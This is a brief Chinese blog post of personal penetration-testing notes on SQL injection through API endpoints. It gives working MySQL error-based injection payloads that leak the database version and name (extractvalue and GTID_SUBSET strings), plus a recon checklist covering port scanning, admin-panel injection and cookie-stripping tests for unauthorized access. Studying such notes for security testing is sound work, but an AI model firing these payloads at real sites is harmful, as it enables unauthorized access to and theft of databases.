api接口导致各种漏洞(sql盲注、报错注入等)

师傅笔记:

1%’ and extractvalue(1, concat(0x7e,(select version()))) and ‘%’=’

1%’ AND GTID_SUBSET(CONCAT(0x7e,(select database()),0x7e),1) AND ‘%’=’

个人笔记:

网站的资产归属

查看开放的端口和服务

尝试访问端口,看能否成功跳转。

查询备案号 进行域名筛选

进入后台管理界面,对input进行sql注入测试。

burp抓包删cookie看看是否有未授权

输入11’报sql语句错误,呢么说明存在注入

1%’ and extractvalue(1, concat(0x7e,(select version()))) and ‘%’=’


api接口导致各种漏洞(sql盲注、报错注入等)
https://jimi-lab.github.io/2024/06/01/api接口导致各种漏洞(sql盲注、报错注入等)/
作者
Jimi
发布于
2024年6月1日
许可协议